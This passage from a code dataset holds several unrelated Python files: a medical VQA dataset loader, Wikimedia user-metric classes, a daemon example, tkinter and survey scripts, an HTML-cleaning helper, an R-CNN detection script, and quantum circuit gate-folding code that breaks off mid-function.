len(self.idx2word)\n\ndef _create_entry(img, data, answer):\n if None!=answer:\n answer.pop('image_name')\n answer.pop('qid')\n entry = {\n 'qid' : data['qid'],\n 'image_name' : data['image_name'],\n 'image' : img,\n 'question' : data['question'],\n 'answer' : answer,\n 'answer_type' : data['answer_type'],\n 'question_type': data['question_type'],\n 'phrase_type' : data['phrase_type']}\n return entry\n\ndef is_json(myjson):\n try:\n json_object = json.loads(myjson)\n except ValueError:\n return False\n return True\n\ndef _load_dataset(dataroot, name, img_id2val, label2ans):\n \"\"\"Load entries\n\n img_id2val: dict {img_id -> val} val can be used to retrieve image or features\n dataroot: root path of dataset\n name: 'train', 'val', 'test'\n \"\"\"\n data_path = os.path.join(dataroot, name + 'set.json')\n samples = json.load(open(data_path))\n samples = sorted(samples, key=lambda x: x['qid'])\n\n answer_path = os.path.join(dataroot, 'cache', '%s_target.pkl' % name)\n answers = cPickle.load(open(answer_path, 'rb'))\n answers = sorted(answers, key=lambda x: x['qid'])\n\n utils.assert_eq(len(samples), len(answers))\n entries = []\n for sample, answer in zip(samples, answers):\n utils.assert_eq(sample['qid'], answer['qid'])\n utils.assert_eq(sample['image_name'], answer['image_name'])\n img_id = sample['image_name']\n if not COUNTING_ONLY or is_howmany(sample['question'], answer, label2ans):\n entries.append(_create_entry(img_id2val[img_id], sample, answer))\n\n return entries\n\nclass VQAFeatureDataset(Dataset):\n def __init__(self, name, args, dictionary, dataroot='data', question_len=12):\n super(VQAFeatureDataset, self).__init__()\n self.args = args\n assert name in ['train', 'test']\n dataroot = args.RAD_dir\n ans2label_path = os.path.join(dataroot, 'cache', 'trainval_ans2label.pkl')\n label2ans_path = os.path.join(dataroot, 'cache', 'trainval_label2ans.pkl')\n self.ans2label = cPickle.load(open(ans2label_path, 'rb'))\n self.label2ans = cPickle.load(open(label2ans_path, 'rb'))\n self.num_ans_candidates = len(self.ans2label)\n\n # End get the number of answer type class\n self.dictionary = dictionary\n\n # TODO: load img_id2idx\n self.img_id2idx = json.load(open(os.path.join(dataroot, 'imgid2idx.json')))\n\n self.entries = _load_dataset(dataroot, name, self.img_id2idx, self.label2ans)\n # load image data for MAML module\n if args.maml:\n # TODO: load images\n images_path = os.path.join(dataroot, 'images84x84.pkl')\n print('loading MAML image data from file: '+ images_path)\n self.maml_images_data = cPickle.load(open(images_path, 'rb'))\n # load image data for Auto-encoder module\n if args.autoencoder:\n # TODO: load images\n images_path = os.path.join(dataroot, 'images128x128.pkl')\n print('loading DAE image data from file: '+ images_path)\n self.ae_images_data = cPickle.load(open(images_path, 'rb'))\n # tokenization\n self.tokenize(question_len)\n self.tensorize()\n if args.autoencoder and args.maml:\n self.v_dim = args.feat_dim * 2\n else:\n self.v_dim = args.feat_dim\n def tokenize(self, max_length=12):\n \"\"\"Tokenizes the questions.\n\n This will add q_token in each entry of the dataset.\n -1 represent nil, and should be treated as padding_idx in embedding\n \"\"\"\n for entry in self.entries:\n tokens = self.dictionary.tokenize(entry['question'], False)\n tokens = tokens[:max_length]\n if len(tokens) < max_length:\n # Note here we pad in front of the sentence\n padding = [self.dictionary.padding_idx] * (max_length - len(tokens))\n tokens = tokens + padding\n utils.assert_eq(len(tokens), max_length)\n entry['q_token'] = tokens\n\n def tensorize(self):\n if self.args.maml:\n self.maml_images_data = torch.from_numpy(self.maml_images_data)\n self.maml_images_data = self.maml_images_data.type('torch.FloatTensor')\n if self.args.autoencoder:\n self.ae_images_data = torch.from_numpy(self.ae_images_data)\n self.ae_images_data = self.ae_images_data.type('torch.FloatTensor')\n for entry in self.entries:\n question = torch.from_numpy(np.array(entry['q_token']))\n entry['q_token'] = question\n\n answer = entry['answer']\n if None!=answer:\n labels = np.array(answer['labels'])\n scores = np.array(answer['scores'], dtype=np.float32)\n if len(labels):\n labels = torch.from_numpy(labels)\n scores = torch.from_numpy(scores)\n entry['answer']['labels'] = labels\n entry['answer']['scores'] = scores\n else:\n entry['answer']['labels'] = None\n entry['answer']['scores'] = None\n\n def __getitem__(self, index):\n entry = self.entries[index]\n question = entry['q_token']\n answer = entry['answer']\n answer_type = entry['answer_type']\n question_type = entry['question_type']\n phrase_type = entry['phrase_type']\n\n image_data = [0, 0]\n if self.args.maml:\n maml_images_data = self.maml_images_data[entry['image']].reshape(84*84)\n image_data[0] = maml_images_data\n if self.args.autoencoder:\n ae_images_data = self.ae_images_data[entry['image']].reshape(128*128)\n image_data[1] = ae_images_data\n\n if None!=answer:\n labels = answer['labels']\n scores = answer['scores']\n target = torch.zeros(self.num_ans_candidates)\n if labels is not None:\n target.scatter_(0, labels, scores)\n return image_data, question, target, answer_type, question_type, phrase_type\n\n else:\n return image_data, question, answer_type, question_type, phrase_type\n\n def __len__(self):\n return len(self.entries)\n\ndef tfidf_from_questions(names, args, dictionary, dataroot='data', target=['rad']):\n inds = [[], []] # rows, cols for uncoalesce sparse matrix\n df = dict()\n N = len(dictionary)\n if args.use_RAD:\n dataroot = args.RAD_dir\n def populate(inds, df, text):\n tokens = dictionary.tokenize(text, True)\n for t in tokens:\n df[t] = df.get(t, 0) + 1\n combin = list(itertools.combinations(tokens, 2))\n for c in combin:\n if c[0] < N:\n inds[0].append(c[0]); inds[1].append(c[1])\n if c[1] < N:\n inds[0].append(c[1]); inds[1].append(c[0])\n\n if 'rad' in target:\n for name in names:\n assert name in ['train', 'test']\n question_path = os.path.join(dataroot, name + 'set.json')\n questions = json.load(open(question_path))\n for question in questions:\n populate(inds, df, question['question'])\n\n # TF-IDF\n vals = [1] * len(inds[1])\n for idx, col in enumerate(inds[1]):\n assert df[col] >= 1, 'document frequency should be greater than zero!'\n vals[col] /= df[col]\n\n # Make stochastic matrix\n def normalize(inds, vals):\n z = dict()\n for row, val in zip(inds[0], vals):\n z[row] = z.get(row, 0) + val\n for idx, row in enumerate(inds[0]):\n vals[idx] /= z[row]\n return vals\n\n vals = normalize(inds, vals)\n\n tfidf = torch.sparse.FloatTensor(torch.LongTensor(inds), torch.FloatTensor(vals))\n tfidf = tfidf.coalesce()\n\n # Latent word embeddings\n emb_dim = 300\n glove_file = os.path.join(dataroot, 'glove', 'glove.6B.%dd.txt' % emb_dim)\n weights, word2emb = utils.create_glove_embedding_init(dictionary.idx2word[N:], glove_file)\n print('tf-idf stochastic matrix (%d x %d) is generated.' % (tfidf.size(0), tfidf.size(1)))\n\n return tfidf, weights\n\nif __name__=='__main__':\n # dictionary = Dictionary.load_from_file('data_RAD/dictionary.pkl')\n # tfidf, weights = tfidf_from_questions(['train'], None, dictionary)\n # w_emb = WordEmbedding(dictionary.ntoken, 300, .0, 'c')\n # w_emb.init_embedding(os.path.join('data_RAD', 'glove6b_init_300d.npy'), tfidf, weights)\n # with open('data_RAD/embed_tfidf_weights.pkl', 'wb') as f:\n # torch.save(w_emb, f)\n # print(\"Saving embedding with tfidf and weights successfully\")\n\n dictionary = Dictionary.load_from_file('data_RAD/dictionary.pkl')\n w_emb = WordEmbedding(dictionary.ntoken, 300, .0, 'c')\n with open('data_RAD/embed_tfidf_weights.pkl', 'rb') as f:\n w_emb = torch.load(f)\n print(\"Load embedding with tfidf and weights successfully\")\n","sub_path":"dataset_RAD.py","file_name":"dataset_RAD.py","file_ext":"py","file_size_in_byte":12039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"307111991","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Library/Python/2.7/site-packages/src/metrics/user_metric.py\n# Compiled at: 2013-01-30 13:44:04\n\"\"\"\n This module will be used to define Wikimedia Foundation user metrics. The\n Strategy behavioural pattern(http://en.wikipedia.org/wiki/Strategy_pattern)\n will be used to implement the metrics generation. In general the UserMetric\n type utilizes the process() function attribute to produce an internal list\n of metrics for a specified set of user handles (typically ID but user names\n may also be specified) passed to the method on call. The execution of\n process() produces a nested list that can be accessed via generator with\n an object call to __iter__().\n\n The class structure is generally as follows: ::\n\n class Metric(object):\n\n def __init__(self):\n # initialize base metric\n\n return\n\n def process(self):\n # base metric implementation\n\n return metric_value\n\n class DerivedMetric(Metric):\n\n def __init__(self):\n super(DerivedMetric, self)\n\n # initialize derived metric\n\n return\n\n def process(self):\n # derived metric implementation\n\n return metric_value\n\n These metrics will be used to support experimentation and measurement\n at the Wikimedia Foundation. The guidelines for this development may\n be found at https://meta.wikimedia.org/wiki/Research:Metrics.\n\n\"\"\"\n__author__ = 'Ryan Faulkner'\n__date__ = 'July 27th, 2012'\n__license__ = 'GPL (version 2 or later)'\nimport src.etl.data_loader as dl, MySQLdb\nfrom collections import namedtuple\nfrom dateutil.parser import parse as date_parse\nfrom datetime import datetime, timedelta\n\ndef pre_metrics_init(init_f):\n \"\"\" Decorator function for subclassed metrics __init__ \"\"\"\n\n def wrapper(self, **kwargs):\n self.append_params(UserMetric)\n self.apply_default_kwargs(kwargs, 'init')\n init_f(self, **kwargs)\n\n return wrapper\n\n\nMETRIC_AGG_METHOD_FLAG = 'metric_agg_flag'\nMETRIC_AGG_METHOD_HEAD = 'metric_agg_head'\nMETRIC_AGG_METHOD_NAME = 'metric_agg_name'\nMETRIC_AGG_METHOD_KWARGS = 'metric_agg_kwargs'\naggregate_data_class = namedtuple('AggregateData', 'header data')\n\ndef aggregator(agg_method, metric, data_header):\n \"\"\" Method for wrapping and executing aggregated data \"\"\"\n if hasattr(agg_method, METRIC_AGG_METHOD_FLAG) and getattr(agg_method, METRIC_AGG_METHOD_FLAG):\n agg_header = getattr(agg_method, METRIC_AGG_METHOD_HEAD) if hasattr(agg_method, METRIC_AGG_METHOD_HEAD) else 'No header specified.'\n kwargs = getattr(agg_method, METRIC_AGG_METHOD_KWARGS) if hasattr(agg_method, METRIC_AGG_METHOD_KWARGS) else {}\n data = [\n getattr(agg_method, METRIC_AGG_METHOD_NAME)] + agg_method(metric, **kwargs)\n else:\n agg_header = [\n 'type'] + [ data_header[i] for i in metric._agg_indices[agg_method.__name__]\n ]\n data = [agg_method.__name__] + agg_method(metric.__iter__(), metric._agg_indices[agg_method.__name__])\n return aggregate_data_class(agg_header, data)\n\n\nclass UserMetric(object):\n ALL_NAMESPACES = 'all_namespaces'\n DATETIME_STR_FORMAT = '%Y%m%d%H%M%S'\n DEFAULT_DATA_RANGE = 14\n _data_model_meta = dict()\n _agg_indices = dict()\n _param_types = {'init': {'date_start': [\n 'str|datetime', 'Earliest date metric is measured.',\n datetime.now() + timedelta(DEFAULT_DATA_RANGE)], \n 'date_end': [\n 'str|datetime', 'Latest date metric is measured.',\n datetime.now()], \n 'project': [\n 'str', 'The project (language) being inspected.',\n 'enwiki'], \n 'namespace': [\n 'int|set', 'The namespace over which the metric is computed.',\n 0]}, \n 'process': {}}\n\n def apply_default_kwargs(self, kwargs, arg_type):\n \"\"\" Apply parameter defaults where necessary \"\"\"\n if hasattr(kwargs, '__iter__') and arg_type in self._param_types:\n for k in self._param_types[arg_type]:\n if k not in kwargs or not kwargs[k]:\n kwargs[k] = self._param_types[arg_type][k][2]\n\n def __init__(self, **kwargs):\n self._data_source_ = dl.Connector(instance='slave')\n self._results = list()\n self._start_ts_ = self._get_timestamp(kwargs['date_start'])\n self._end_ts_ = self._get_timestamp(kwargs['date_end'])\n self._project_ = kwargs['project']\n namespace = kwargs['namespace']\n if not namespace == self.ALL_NAMESPACES:\n if not hasattr(namespace, '__iter__'):\n namespace = [namespace]\n self._namespace_ = set(namespace)\n else:\n self._namespace_ = namespace\n\n def __str__(self):\n return ('\\n').join([str(self._data_source_._db_),\n str(self.__class__),\n str(self._namespace_),\n self._project_])\n\n def __iter__(self):\n return (r for r in self._results)\n\n def __del__(self):\n if hasattr(self, '_data_source_') and hasattr(self._data_source_, 'close_db'):\n self._data_source_.close_db()\n\n def append_params(self, class_ref):\n \"\"\" Append params from class reference \"\"\"\n if hasattr(class_ref, '_param_types'):\n for k, v in class_ref._param_types['init'].iteritems():\n self.__class__._param_types['init'][k] = v\n\n for k, v in class_ref._param_types['process'].iteritems():\n self.__class__._param_types['process'][k] = v\n\n @property\n def date_start(self):\n return self._start_ts_\n\n @property\n def date_end(self):\n return self._end_ts_\n\n @classmethod\n def _construct_data_point(cls):\n return namedtuple(cls.__name__, cls.header())\n\n @classmethod\n def _get_timestamp(cls, ts_representation):\n \"\"\"\n Helper method. Takes a representation of a date object (String or\n datetime.datetime object) and formats as a timestamp:\n \"YYYY-MM-DD HH:II:SS\"\n\n - Parameters:\n - *date_representation* - String or datetime. A formatted\n timestamp representation\n\n - Return:\n - String. Timestamp derived from argument in format\n \"YYYY-MM-DD HH:II:SS\".\n \"\"\"\n try:\n datetime_obj = date_parse(ts_representation[:19])\n except AttributeError:\n datetime_obj = ts_representation\n except TypeError:\n datetime_obj = ts_representation\n\n try:\n timestamp = datetime_obj.strftime(cls.DATETIME_STR_FORMAT)\n return timestamp\n except ValueError:\n raise cls.UserMetricError(message='Could not parse timestamp: %s' % datetime_obj.__str__())\n\n @classmethod\n def _escape_var(cls, var):\n \"\"\"\n Escapes either elements of a list (recursively visiting elements)\n or a single variable. The variable is cast to string before being\n escaped.\n\n - Parameters:\n - **var**: List or string. Variable or list (potentially\n nested) of variables to be escaped.\n\n - Return:\n - List or string. escaped elements.\n \"\"\"\n if hasattr(var, '__iter__'):\n escaped_var = list()\n for elem in var:\n escaped_var.append(cls._escape_var(elem))\n\n return escaped_var\n return MySQLdb.escape_string(str(var))\n\n @classmethod\n def _format_namespace(cls, namespace):\n ns_cond = ''\n if hasattr(namespace, '__iter__'):\n if len(namespace) == 1:\n ns_cond = 'page_namespace = ' + str(namespace.pop())\n else:\n ns_cond = 'page_namespace in (' + (',').join(dl.DataLoader().cast_elems_to_string(list(namespace))) + ')'\n return ns_cond\n\n @staticmethod\n def header():\n raise NotImplementedError\n\n @staticmethod\n def pre_process_users(proc_func):\n\n def wrapper(self, users, **kwargs):\n if hasattr(users, 'get_users'):\n users = [ u for u in users.get_users(self._start_ts_, self._end_ts_) ]\n return proc_func(self, users, **kwargs)\n\n return wrapper\n\n def process(self, users, **kwargs):\n raise NotImplementedError()\n\n class UserMetricError(Exception):\n \"\"\" Basic exception class for UserMetric types \"\"\"\n\n def __init__(self, message='Unable to process results using strategy.'):\n Exception.__init__(self, message)","sub_path":"pycfiles/wmf_user_metrics-0.1.1.macosx-10.7-intel.tar/user_metric.py","file_name":"user_metric.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69087301","text":"# -*- coding: utf-8 -*-\n# http://ymotongpoo.hatenablog.com/entry/20111217/1324125102\n\nimport time\nfrom datetime import datetime\nimport os,sys,lockfile\nimport daemon\n\ndef daemon_process():\n while True:\n print( \"pid: %d, ppid: %d, time: %s\" %\n (os.getpid(), os.getppid(), datetime.now()) )\n sys.stdout.flush()\n time.sleep(5)\n\nworking_dir = os.path.abspath(os.path.dirname(__file__))\n\ncontext = daemon.DaemonContext(\n working_directory = working_dir,\n stdout = open(\"stdout_file.txt\", \"w+\"),\n stderr = open(\"stderr_file.txt\", \"w+\")\n)\n\nif __name__ == '__main__':\n with context:\n daemon_process()\n","sub_path":"python/daemon/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576247875","text":"import tkinter as tk\n\ncounter = 0\n\nstyles = [dict(bg=\"azure\", fg=\"#333333\"), dict(fg=\"white\", bg=\"black\")]\n\ndef add_label(Event=None):\n\n global counter\n name = user_entry.get()\n if len(name) < 3:\n hint.configure(text=\"Введите хотябы три символа\")\n return\n\n user_entry.delete(0, tk.END)\n new_label = tk.Label(window, text=name, pady=\"10\")\n new_label.configure(styles[counter%2])\n if counter >= 5:\n counter = 0\n children = window.winfo_children()\n for element in filter(lambda x: isinstance(x, tk.Label) and x.winfo_name() not in ('!label1', '!label2') != '!label', children):\n element.destroy()\n\n new_label.pack(fill=tk.X)\n\n counter += 1\n\n\n\nwindow = tk.Tk()\n\nwindow.geometry(\"400x500\")\n\nwindow.resizable(False, False)\n\nuser_entry = tk.Entry(window, width=\"60\")\nuser_entry.pack()\nuser_entry.focus_set()\n\ntk.Button(window, text=\"Beech\", command=add_label).pack()\n\nhint = tk.Label(window, text=\"Введите хотябы три символа\", fg=\"indian red\", font=(\"Time New Roman\", 10))\nhint.pack()\n\n# tk.Label(window, text=\"Тыч в кнопку\", pady=\"30\", bg=\"NavajoWhite2\", fg=\"#885144\").pack()\n\nuser_entry.bind('',add_label)\n\nwindow.mainloop()","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"592528744","text":"\"\"\"\nPodemos pedir a quantidade de entrada que for necessária a cada passagem\npor um laço while. Vamos criar um programa de enquete em que cada\npassagem pelo laço solicita o nome do participante e uma resposta.\nArmazenaremos os dados coletados em um dicionário, pois queremos\nassociar cada resposta a um usuário em particular:\n\"\"\"\n\nrespostas = {}\n\n#Define uma flag para indicar que a enquete está ativa\npesquisa_ativa = True\n\nwhile pesquisa_ativa:\n #Pede o nome da pessoa e a resposta\n nome = input(\"\\nQual é o seu nome? \")\n resposta = input(\"Qual montanha você gostaria de escalar um dia? \")\n\n #Armazena a resposta no dicionário\n respostas[nome] = resposta\n\n #Descobre se outra pessoa vai responder à enquete\n repetir = input(\"Gostaria de deixar outra pessoa responder? (Sim / Não) \")\n if repetir == 'não':\n pesquisa_ativa = False\n\n#A enquete foi concluída. Mostra os resultados\nprint(\"\\n--- Resultados da Pesquisa ---\")\nfor nome, resposta in respostas.items():\n print(nome + \" gostaria de subir no(a) \" + resposta + \".\")","sub_path":"Capitulo 7/montanha_pesquisa.py","file_name":"montanha_pesquisa.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"175367279","text":"# coding=utf8\n# Create by 吴俊 on 2016/5/12\n\nimport re\n\n\n# 去除文本中html标签并保留原格式工具类\n# 使用方法:\n# # from Tool import *\n# # tool = Tool()\n# # tool.replaceHTMLTag(html)\nclass Tool:\n\tdef __init__(self):\n\t\t# 去除img标签,7位长空格\n\t\tself.removeImg = re.compile(u'| {7}|')\n\t\t# 删除超链接标签\n\t\tself.removeAddr = re.compile(u'|')\n\t\t# 把换行的标签换为\\n\n\t\tself.repalceLine = re.compile(u'|
    |
    |

    ')\n\t\t# 将表格制表替换为\\t\n\t\tself.repalceTD = re.compile(u'')\n\t\t# 把段落开头换为\\n加两空格\n\t\tself.repalcePara = re.compile(u'')\n\t\t# 将换行符或双换行符替换为\\n\n\t\tself.repalceBR = re.compile(u'

    |
    ')\n\t\t# 将其余标签剔除\n\t\tself.repalceExtraTag = re.compile(u'<.*?>')\n\n\tdef replaceHTMLTag(self, html):\n\t\thtml = re.sub(self.removeImg, \"\", html)\n\t\thtml = re.sub(self.removeAddr, \"\", html)\n\t\thtml = re.sub(self.repalceLine, \"\\n\", html)\n\t\thtml = re.sub(self.repalceTD, \"\\t\", html)\n\t\thtml = re.sub(self.repalcePara, \"\\n \", html)\n\t\thtml = re.sub(self.repalceBR, \"\\n\", html)\n\t\thtml = re.sub(self.repalceExtraTag, \"\", html)\n\t\t# strip()将前后多余内容删除\n\t\treturn html.strip()\n\n\nif __name__ == '__main__':\n\tprint(u'这是一个去除文本中html标签并保留原格式工具类')\n","sub_path":"BaiDuTieBa/Tool.py","file_name":"Tool.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"509190152","text":"import os\nimport argparse\nimport time\nimport _thread\n\nimport _init_paths # pylint: disable=unused-import\n\nfrom urllib import request\nimport cv2\nimport numpy as np\nimport base64\nimport urllib3\nimport uuid\n\nimport torch\n\nfrom rcnn.core.config import cfg, merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg\nfrom rcnn.modeling.parsing_rcnn.inference import parsing_results\nfrom rcnn.core.test_engine import initialize_model_from_cfg\nimport rcnn.core.test as rcnn_test\n\n# Parse arguments\nparser = argparse.ArgumentParser(description='Hier R-CNN Detect')\nparser.add_argument('--cfg', dest='cfg_file',\n help='optional config file',\n default='./cfgs/mscoco_humanparts/e2e_hier_rcnn_R-50-FPN_1x.yaml', type=str)\nparser.add_argument('--gpu_id', type=str, default='0,1,2,3,4,5,6,7', help='gpu id for evaluation')\nparser.add_argument('opts', help='See rcnn/core/config.py for all options',\n default=None,\n nargs=argparse.REMAINDER)\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_id\n\n# http连接池\nhttp_client = urllib3.PoolManager()\n\ndef main():\n if len(args.gpu_id.split(',')) == 1:\n local_rank = int(args.gpu_id.split(',')[0])\n else:\n local_rank = -1\n args.local_rank = local_rank\n\n num_gpus = len(args.gpu_id.split(','))\n multi_gpu_testing = True if num_gpus > 1 else False\n\n if args.cfg_file is not None:\n merge_cfg_from_file(args.cfg_file)\n if args.opts is not None:\n merge_cfg_from_list(args.opts)\n\n assert_and_infer_cfg(make_immutable=False)\n args.test_net_file, _ = os.path.splitext(__file__)\n\n model = initialize_model_from_cfg()\n\n start_time = time.time()\n image = cv2.imread('', cv2.IMREAD_COLOR)\n box_results, par_results, par_score = detect(model, image)\n print(' cost: ' + str(time.time() - start_time))\n\n print(dict(\n boxes=box_results,\n parss=par_results,\n pscores=par_score,\n ))\n\ndef get_image_from_base64(base64_code):\n ''' \n base64转成opencv的图片对象\n '''\n img_data = base64.b64decode(base64_code)\n return read_image(img_data)\n\ndef get_image_from_url(url):\n '''\n 把图片url转成opencv的图片对象\n '''\n img_data = http_client.request(\"GET\", url).data\n print(img_data.count)\n return read_image(img_data)\n\ndef read_image(img_data):\n '''\n 把字节数组转成opencv的图片对象\n '''\n imgArray = np.frombuffer(img_data, np.uint8)\n img = cv2.imdecode(imgArray, cv2.IMREAD_COLOR)\n # cv2.imwrite('/Users/kevin/Downloads/2020.jpg', img)\n return img\n\n\ndef detect(model, image):\n start_time = time.time()\n with torch.no_grad():\n results, features = rcnn_test.im_detect_bbox(model, [image])\n print(\"1 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n\n if cfg.MODEL.MASK_ON:\n result = rcnn_test.im_detect_mask(model, results, features)\n print(\"2 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n if cfg.MODEL.PARSING_ON:\n result = rcnn_test.im_detect_parsing(model, results, features)\n print(\"3 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n\n if not results or len(results) != 1 or len(results[0]) == 0:\n return None\n\n image_height = image.shape[0]\n image_width = image.shape[1]\n\n cpu_device = torch.device(\"cpu\")\n result = result[0].to(cpu_device)\n result = result.resize((image_width, image_height))\n \n return post_processing(result, image)\n\ndef post_processing(result, image):\n start_time = time.time()\n box_results = prepare_box_results(result, image)\n print(\"4 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n\n if cfg.MODEL.PARSING_ON:\n par_results, par_score = prepare_parsing_results(result, image)\n print(\"5 cost: \" + str(time.time() - start_time))\n start_time = time.time()\n else:\n par_results = []\n par_score = []\n\n return box_results, par_results, par_score\n\ndef prepare_box_results(result, image):\n scores = result.get_field(\"scores\").tolist()\n result = result.convert(\"xywh\")\n boxes = result.bbox.tolist()\n\n return [\n {\n \"bbox\": box,\n \"score\": scores[k],\n }\n for k, box in enumerate(boxes)\n ]\n\ndef prepare_parsing_results(result, image):\n semseg = result.get_field(\"semseg\") if cfg.MODEL.SEMSEG_ON else None\n parsing = result.get_field(\"parsing\")\n parsing = parsing_results(parsing, result, semseg=semseg)\n scores = result.get_field(\"parsing_scores\")\n\n return parsing, scores\n\nif __name__ == '__main__':\n main()","sub_path":"tools/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"648423693","text":"\"\"\"Functions for folding gates in valid mitiq circuits.\n\nPublic functions work for any circuit types supported by mitiq.\nPrivate functions work only for iternal mitiq circuit representations.\n\"\"\"\nfrom copy import deepcopy\nfrom typing import Any, Callable, Iterable, List, Optional, Tuple, Union\n\nimport numpy as np\n\nfrom cirq import Circuit, InsertStrategy, inverse, ops\nfrom mitiq import QPROGRAM, SUPPORTED_PROGRAM_TYPES\n\n\nclass UnsupportedCircuitError(Exception):\n pass\n\n\n# Helper functions\ndef _is_measurement(op: ops.Operation) -> bool:\n \"\"\"Returns true if the operation's gate is a measurement, else False.\n\n Args:\n op: Gate operation.\n \"\"\"\n return isinstance(op.gate, ops.measurement_gate.MeasurementGate)\n\n\ndef _pop_measurements(\n circuit: Circuit,\n) -> List[List[Union[int, ops.Operation]]]:\n \"\"\"Removes all measurements from a circuit.\n\n Args:\n circuit: a quantum circuit as a :class:`cirq.Circuit` object.\n\n Returns:\n measurements: list\n \"\"\"\n measurements = [\n list(m) for m in circuit.findall_operations(_is_measurement)\n ]\n circuit.batch_remove(measurements)\n return measurements\n\n\ndef _append_measurements(\n circuit: Circuit, measurements: List[Union[int, ops.Operation]]\n) -> None:\n \"\"\"Appends all measurements into the final moment of the circuit.\n\n Args:\n circuit: a quantum circuit as a :class:`cirq.Circuit`.\n measurements: measurements to perform.\n \"\"\"\n for i in range(len(measurements)):\n measurements[i][0] = (\n len(circuit) + 1\n ) # Make sure the moment to insert into is the last in the circuit\n circuit.batch_insert(measurements)\n\n\n# Conversions\ndef convert_to_mitiq(circuit: QPROGRAM) -> Tuple[Circuit, str]:\n \"\"\"Converts any valid input circuit to a mitiq circuit.\n\n Args:\n circuit: Any quantum circuit object supported by mitiq.\n See mitiq.SUPPORTED_PROGRAM_TYPES.\n\n Raises:\n UnsupportedCircuitError: If the input circuit is not supported.\n\n Returns:\n circuit: Mitiq circuit equivalent to input circuit.\n input_circuit_type: Type of input circuit represented by a string.\n \"\"\"\n if \"qiskit\" in circuit.__module__:\n from mitiq.mitiq_qiskit.conversions import _from_qiskit\n input_circuit_type = \"qiskit\"\n mitiq_circuit = _from_qiskit(circuit)\n elif isinstance(circuit, Circuit):\n input_circuit_type = \"cirq\"\n mitiq_circuit = circuit\n else:\n raise UnsupportedCircuitError(\n f\"Circuit from module {circuit.__module__} is not supported.\\n\\n\" +\n f\"Circuit types supported by mitiq are \\n{SUPPORTED_PROGRAM_TYPES}\"\n )\n return mitiq_circuit, input_circuit_type\n\n\ndef convert_from_mitiq(circuit: Circuit, conversion_type: str) -> QPROGRAM:\n \"\"\"Converts a mitiq circuit to a type specificed by the conversion type.\n\n Args:\n circuit: Mitiq circuit to convert.\n conversion_type: String specifier for the converted circuit type.\n \"\"\"\n if conversion_type == \"qiskit\":\n from mitiq.mitiq_qiskit.conversions import _to_qiskit\n converted_circuit = _to_qiskit(circuit)\n elif isinstance(circuit, Circuit):\n converted_circuit = circuit\n else:\n raise UnsupportedCircuitError(\n f\"Conversion to circuit of type {conversion_type} is not supported.\"\n f\"\\nCircuit types supported by mitiq are {SUPPORTED_PROGRAM_TYPES}\"\n )\n return converted_circuit\n\n\ndef converter(fold_method: Callable) -> Callable:\n \"\"\"Decorator for handling conversions.\"\"\"\n def new_fold_method(circuit: QPROGRAM, *args, **kwargs) -> QPROGRAM:\n mitiq_circuit, input_circuit_type = convert_to_mitiq(circuit)\n if kwargs.get(\"keep_input_type\"):\n return convert_from_mitiq(\n fold_method(mitiq_circuit, *args, **kwargs), input_circuit_type\n )\n return fold_method(mitiq_circuit, *args, **kwargs)\n return new_fold_method\n\n\n# Gate level folding\ndef _fold_gate_at_index_in_moment(\n circuit: Circuit, moment_index: int, gate_index: int\n) -> None:\n \"\"\"Replaces, in a circuit, the gate G in (moment, index) with G G^dagger G.\n\n Args:\n circuit: Circuit to fold.\n moment_index: Moment in which the gate sits in the circuit.\n gate_index: Index of the gate within the specified moment.\n \"\"\"\n op = circuit[moment_index].operations[gate_index]\n circuit.insert(\n moment_index, [op, inverse(op)], strategy=InsertStrategy.NEW\n )\n\n\ndef _fold_gates_in_moment(\n circuit: Circuit, moment_index: int, gate_indices: Iterable[int]\n) -> None:\n \"\"\"Modifies the input circuit by applying the map G -> G G^dag G to all\n gates specified by the input moment index and gate indices.\n\n Args:\n circuit: Circuit to fold.\n moment_index: Index of moment to fold gates in.\n gate_indices: Indices of gates within the moments to fold.\n \"\"\"\n for (i, gate_index) in enumerate(gate_indices):\n _fold_gate_at_index_in_moment(\n circuit, moment_index + 2 * i, gate_index\n ) # Each fold adds two moments\n\n\n@converter\ndef fold_gates(\n circuit: QPROGRAM,\n moment_indices: Iterable[int],\n gate_indices: List[Iterable[int]],\n **kwargs,\n) -> QPROGRAM:\n \"\"\"Returns a new circuit with specified gates folded.\n\n Args:\n circuit: Circuit to fold.\n moment_indices: Indices of moments with gates to be folded.\n gate_indices: Specifies which gates within each moment to fold.\n\n Keyword Args:\n keep_input_type: If True, returns a circuit of the input type, else\n returns a mitiq circuit.\n\n Returns:\n folded: the folded quantum circuit as a :class:`cirq.Circuit` object.\n\n Examples:\n (1) Folds the first three gates in moment two.\n >>> fold_gates(circuit, moment_indices=[1], gate_indices=[(0, 1, 2)])\n\n (2) Folds gates with indices 1, 4, and 5 in moment 0,\n and gates with indices 0, 1, and 2 in moment 1.\n >>> fold_gates(circuit, moment_indices=[0, 3],\n >>> gate_indices=[(1, 4, 5), (0, 1, 2)])\n \"\"\"\n folded = deepcopy(circuit)\n moment_index_shift = 0\n for (i, moment_index) in enumerate(moment_indices):\n 